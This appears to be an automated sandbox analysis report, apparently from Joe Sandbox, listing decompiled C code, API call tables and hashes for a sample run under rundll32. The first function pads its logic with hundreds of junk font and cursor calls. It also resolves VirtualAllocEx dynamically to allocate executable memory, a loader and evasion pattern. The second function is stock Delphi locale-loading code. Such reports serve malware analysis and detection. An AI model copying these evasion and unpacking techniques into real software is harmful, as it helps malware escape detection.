                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					_t236 = LoadCursorW(0, 0xe49);
                          					_t237 =  *0x2865d1c; // 0x28d7800
                          					_t240 = LoadCursorW(0, 0xe49);
                          					_t241 = LoadCursorW(0, 0xe49);
                          					_t242 = LoadCursorW(0, 0xe49);
                          					_t243 = LoadCursorW(0, 0xe49);
                          					_t244 = LoadCursorW(0, 0xe49);
                          					_t245 = LoadCursorW(0, 0xe49);
                          					_t246 = LoadCursorW(0, 0xe49);
                          					_t247 = LoadCursorW(0, 0xe49);
                          					_t248 = LoadCursorW(0, 0xe49);
                          					_t249 = LoadCursorW(0, 0xe49);
                          					_t250 = LoadCursorW(0, 0xe49);
                          					_t251 = LoadCursorW(0, 0xe49);
                          					_t252 = LoadCursorW(0, 0xe49);
                          					_t253 = LoadCursorW(0, 0xe49);
                          					_t254 = LoadCursorW(0, 0xe49);
                          					_t255 = LoadCursorW(0, 0xe49);
                          					_t256 = LoadCursorW(0, 0xe49);
                          					_t257 = LoadCursorW(0, 0xe49);
                          					_t258 = LoadCursorW(0, 0xe49);
                          					_t259 = LoadCursorW(0, 0xe49);
                          					_t260 = LoadCursorW(0, 0xe49);
                          					_t261 = LoadCursorW(0, 0xe49);
                          					_t262 = LoadCursorW(0, 0xe49);
                          					_t263 = LoadCursorW(0, 0xe49);
                          					_t264 = LoadCursorW(0, 0xe49);
                          					_t265 = LoadCursorW(0, 0xe49);
                          					_t266 = LoadCursorW(0, 0xe49);
                          					_t267 = LoadCursorW(0, 0xe49);
                          					_t268 = LoadCursorW(0, 0xe49);
                          					_t269 = LoadCursorW(0, 0xe49);
                          					_t270 = LoadCursorW(0, 0xe49);
                          					_t271 =  *0x2865d1c; // 0x28d7800
                          					 *_t271 = _t236 + ( *_t237 ^ _v40 + _v84 + _v72) + _t240 + _t241 + _t242 + _t243 + _t244 + _t245 + _t246 + _t247 + _t248 + _t249 + _t250 + _t251 + _t252 + _t253 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t260 + _t261 + _t262 + _t263 + _t264 + _t265 + _t266 + _t267 + _t268 + _t269 + _t270;
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					_v72 = _v72 + 4;
                          					 *0x2865d1c =  &(( *0x2865d1c)[1]);
                          				}
                          				_v36 = 0x1000;
                          				_t121 =  *0x2865d18; // 0x28cfffc
                          				_t124 = _t121 + _v32 - _v36 + 4;
                          				_v24 = _t124;
                          				_push(_v8);
                          				_push(_v12);
                          				_push(_v20);
                          				_push(_v16);
                          				_push( *0x2865668);
                          				_push(1);
                          				_push(_v24);
                          				return _t124;
                          			}

                          APIs
                          • GetEnhMetaFileW.GDI32(02861FFC,00001205,gyy), ref: 028615FF
                          • GetEnhMetaFileW.GDI32(02861FFC,02861FFC,00001205,gyy), ref: 02861609
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861690
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286169A
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616A4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616AE
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616B8
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616C2
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616CC
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616D6
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616E0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616EA
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616F4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616FE
                          • LoadLibraryA.KERNEL32(kernel32,VirtualAllocEx,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC), ref: 0286170D
                          • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02861713
                          • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00001000,00000040,VirtualAllocEx,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC), ref: 02861737
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861781
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286178B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861795
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286179F
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617A9
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617B3
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617BD
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617C7
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617D1
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617DB
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617E5
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617EF
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861843
                          • DeleteObject.GDI32(00000000), ref: 02861858
                          • DeleteObject.GDI32(00000000), ref: 02861861
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861874
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286187E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861888
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861892
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286189C
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618A6
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618B0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618BA
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618C4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618CE
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618D8
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618E2
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618EC
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618F6
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861900
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286190A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861914
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286191E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861928
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861932
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286193C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861946
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861950
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286195A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861964
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286196E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861978
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861982
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286198C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861996
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619A0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619AA
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619B4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619BE
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619C8
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619D2
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619DC
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619E6
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619F0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619FA
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A04
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A0E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A18
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A22
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A2C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A36
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A40
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A4A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A54
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A5E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A68
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A72
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A7C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A86
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A90
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A9A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AA4
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AAE
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AB8
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AC2
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861ACC
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AD6
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AE0
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AEA
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AF4
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AFE
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B08
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B12
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B1C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B26
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B30
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B3A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B44
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B4E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B58
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B62
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B6C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B76
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B80
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B8A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B94
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B9E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BA8
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BB2
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BBC
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BC6
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BD0
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BDA
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BE4
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BEE
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BF8
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C02
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C0C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C16
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C20
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C2A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C34
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C3E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C48
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C52
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C5C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C66
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C70
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C7A
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861C86
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CA8
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CB6
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CC4
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CD2
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CE0
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CEE
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CFC
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D0A
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D18
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D26
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D34
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D42
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D50
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D5E
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D6C
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D7A
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D88
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D96
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DA4
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DB2
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DC0
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DCE
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DDC
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DEA
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DF8
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E06
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E14
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E22
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E30
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E3E
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E4C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E5F
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E69
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E73
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E7D
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E87
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E91
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E9B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EA5
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EAF
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EB9
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EC3
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861ECD
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861ED7
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EE1
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EEB
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EF5
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EFF
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F09
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F13
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F1D
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F27
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F31
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F3B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F45
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F4F
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F59
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F63
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F6D
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F77
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F81
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F8B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F95
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FontResource$Load$Cursor$DeleteFileMetaObject$AddressAllocLibraryProcVirtual
                          • String ID: VirtualAllocEx$gyy$kernel32${
                          • API String ID: 3736478088-3386851043
                          • Opcode ID: 1fe5a7350bf6ea65692cb9d1066232f7ba46fa4ffb252e14e7b39c824726c3b5
                          • Instruction ID: 9b2fd403c2cede7144c84ae09bbc6b668f80937c962c13fed41cd6a5a46a6075
                          • Opcode Fuzzy Hash: 1fe5a7350bf6ea65692cb9d1066232f7ba46fa4ffb252e14e7b39c824726c3b5
                          • Instruction Fuzzy Hash: E9123E6E6A03197EF642BBB5EC8EF6E7B7A5B0CB12F100810E649B5783DBD914404D62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 65%
                          			E027D575C(intOrPtr __eax) {
                          				intOrPtr _v8;
                          				void* _v12;
                          				char _v15;
                          				char _v17;
                          				char _v18;
                          				char _v22;
                          				int _v28;
                          				char _v289;
                          				long _t44;
                          				long _t61;
                          				long _t63;
                          				CHAR* _t70;
                          				CHAR* _t72;
                          				struct HINSTANCE__* _t78;
                          				struct HINSTANCE__* _t84;
                          				char* _t94;
                          				void* _t95;
                          				intOrPtr _t99;
                          				struct HINSTANCE__* _t107;
                          				void* _t110;
                          				void* _t112;
                          				intOrPtr _t113;
                          
                          				_t110 = _t112;
                          				_t113 = _t112 + 0xfffffee0;
                          				_v8 = __eax;
                          				GetModuleFileNameA(0,  &_v289, 0x105);
                          				_v22 = 0;
                          				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                          				if(_t44 == 0) {
                          					L3:
                          					_push(_t110);
                          					_push(0x27d5861);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t113;
                          					_v28 = 5;
                          					E027D55A4( &_v289, 0x105);
                          					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E027D59C8, 0, 0,  &_v22,  &_v28) != 0) {
                          						_v22 = 0;
                          					}
                          					_v18 = 0;
                          					_pop(_t99);
                          					 *[fs:eax] = _t99;
                          					_push(E027D5868);
                          					return RegCloseKey(_v12);
                          				} else {
                          					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                          					if(_t61 == 0) {
                          						goto L3;
                          					} else {
                          						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                          						if(_t63 != 0) {
                          							_push(0x105);
                          							_push(_v8);
                          							_push( &_v289);
                          							L027D1354();
                          							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                          							_t107 = 0;
                          							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                          								_t70 =  &_v289;
                          								_push(_t70);
                          								L027D135C();
                          								_t94 = _t70 +  &_v289;
                          								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                          									_t94 = _t94 - 1;
                          								}
                          								_t72 =  &_v289;
                          								if(_t94 != _t72) {
                          									_t95 = _t94 + 1;
                          									if(_v22 != 0) {
                          										_push(0x105 - _t95 - _t72);
                          										_push( &_v22);
                          										_push(_t95);
                          										L027D1354();
                          										_t107 = LoadLibraryExA( &_v289, 0, 2);
                          									}
                          									if(_t107 == 0 && _v17 != 0) {
                          										_push(0x105 - _t95 -  &_v289);
                          										_push( &_v17);
                          										_push(_t95);
                          										L027D1354();
                          										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                          										_t107 = _t78;
                          										if(_t107 == 0) {
                          											_v15 = 0;
                          											_push(0x105 - _t95 -  &_v289);
                          											_push( &_v17);
                          											_push(_t95);
                          											L027D1354();
                          											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                          											_t107 = _t84;
                          										}
                          									}
                          								}
                          							}
                          							return _t107;
                          						} else {
                          							goto L3;
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00001205,028630A4), ref: 027D5778
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D5796
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D57B4
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D57D2
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D581B
                          • RegQueryValueExA.ADVAPI32(?,027D59C8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001), ref: 027D5839
                          • RegCloseKey.ADVAPI32(?,027D5868,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D585B
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5878
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5885
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D588B
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D58B6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D58FD
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D590D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5935
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5945
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D596B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 027D597B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1759228003-3917250287
                          • Opcode ID: 25640bfb61e60c37bff90aa815cff198857b5f362b013138893c90794c92ae72
                          • Instruction ID: 0f67cec8d49b540c2a4ab54bb84d2e9b7bffb3f0fdcd79632a81f3667b72261b
                          • Opcode Fuzzy Hash: 25640bfb61e60c37bff90aa815cff198857b5f362b013138893c90794c92ae72
